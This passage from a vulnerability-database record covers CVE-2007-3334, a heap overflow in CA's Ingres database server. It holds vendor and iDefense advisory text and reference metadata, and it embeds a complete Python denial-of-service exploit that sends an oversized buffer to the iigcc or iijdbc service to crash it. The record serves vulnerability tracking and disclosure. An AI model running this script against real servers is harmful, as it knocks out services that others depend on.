35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities\n\niDefense Security Advisory 06.21.07\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nJun 21, 2007\n\nI. BACKGROUND\n\nIngres is the database backend used by default in several CA products. \nThe SCM (Secure Content Manager) is one of the products that uses\nIngres. The SCM use Ingres to store quarantined virii and blocked HTTP\nrequests/replies. For more information visit the following URLs. \n\nhttp://www3.ca.com/solutions/Product.aspx?ID=1013\n\nhttp://www.ingres.com/\n\nII. The Communications\nServer is the main component responsible for receiving and handling\nrequests from the network. The Data Access Server is responsible for\nhandling requests from the Ingres JDBC Driver and .NET data providers. \nThese requests are decoded into Ingres internal formats and passed on\nto other components of the database server. \n\nThe application does not properly validate the length of attacker\nsupplied data before copying it into a fixed size heap buffer. This\nleads to an exploitable condition. \n\nIII. ANALYSIS\n\nExploitation allows an unauthenticated attacker to execute arbitrary\ncode with SYSTEM privileges. \n\nIn order to exploit this vulnerability an attacker would have to send a\nmalformed request to the database server. This requires the ability to\nestablish a TCP session on port 10916 (iigcc) or 10923 (iigcd). \n\nExploitation has been demonstrated to be trivial. \n\nIV. Previous versions may also be affected. In addition, any\napplication that uses the Ingres Database may be vulnerable. \n\nV. WORKAROUND\n\nEmploying firewalls or other access control methods can effectively\nreduce exposure to this vulnerability. \n\nVI. VENDOR RESPONSE\n\nCA has made fixes available for all supported CA products that embed\nIngres. For more information consult CA\u0027s Security Alert at the\nfollowing URL. \n\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-3334 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n01/16/2007 Initial vendor notification\n01/17/2007 Initial vendor response\n06/21/2007 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "BID",
"id": "24585"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3334",
"trust": 3.0
},
{
"db": "BID",
"id": "24585",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "25775",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25756",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2288",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2290",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1018278",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "37488",
"trust": 1.0
},
{
"db": "OSVDB",
"id": "37487",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222",
"trust": 0.8
},
{
"db": "XF",
"id": "35002",
"trust": 0.6
},
{
"db": "XF",
"id": "34992",
"trust": 0.6
},
{
"db": "XF",
"id": "34991",
"trust": 0.6
},
{
"db": "IDEFENSE",
"id": "20070621 INGRES DATABASE MULTIPLE HEAP CORRUPTION VULNERABILITIES",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57276",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92818",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"id": "VAR-200706-0395",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2024-11-23T22:09:53.438000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.actian.com/products/ingres"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://windows.microsoft.com/en-US/windows/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"trust": 2.0,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"trust": 2.0,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1018278"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24585"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25775"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25756"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37487"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37488"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3334"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/35002"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34992"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34991"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2290"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2288"
},
{
"trust": 0.4,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/472192"
},
{
"trust": 0.3,
"url": "/archive/1/471950"
},
{
"trust": 0.3,
"url": "/archive/1/472197"
},
{
"trust": 0.3,
"url": "/archive/1/472193"
},
{
"trust": 0.3,
"url": "/archive/1/472194"
},
{
"trust": 0.3,
"url": "/archive/1/472200"
},
{
"trust": 0.3,
"url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
},
{
"trust": 0.3,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ngssoftware.com/research/advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/solutions/product.aspx?id=1013"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-21T00:00:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"date": "2007-06-26T21:32:27",
"db": "PACKETSTORM",
"id": "57303"
},
{
"date": "2007-06-26T20:06:58",
"db": "PACKETSTORM",
"id": "57276"
},
{
"date": "2010-08-17T01:35:50",
"db": "PACKETSTORM",
"id": "92818"
},
{
"date": "2007-06-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"date": "2007-06-21T22:30:00",
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T08:36:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"date": "2007-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"date": "2024-11-21T00:32:58.790000",
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "eTrust Secure Content Manager including CA Used in products Ingres Database Server For Communications Server Heap-based buffer overflow vulnerability in components",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.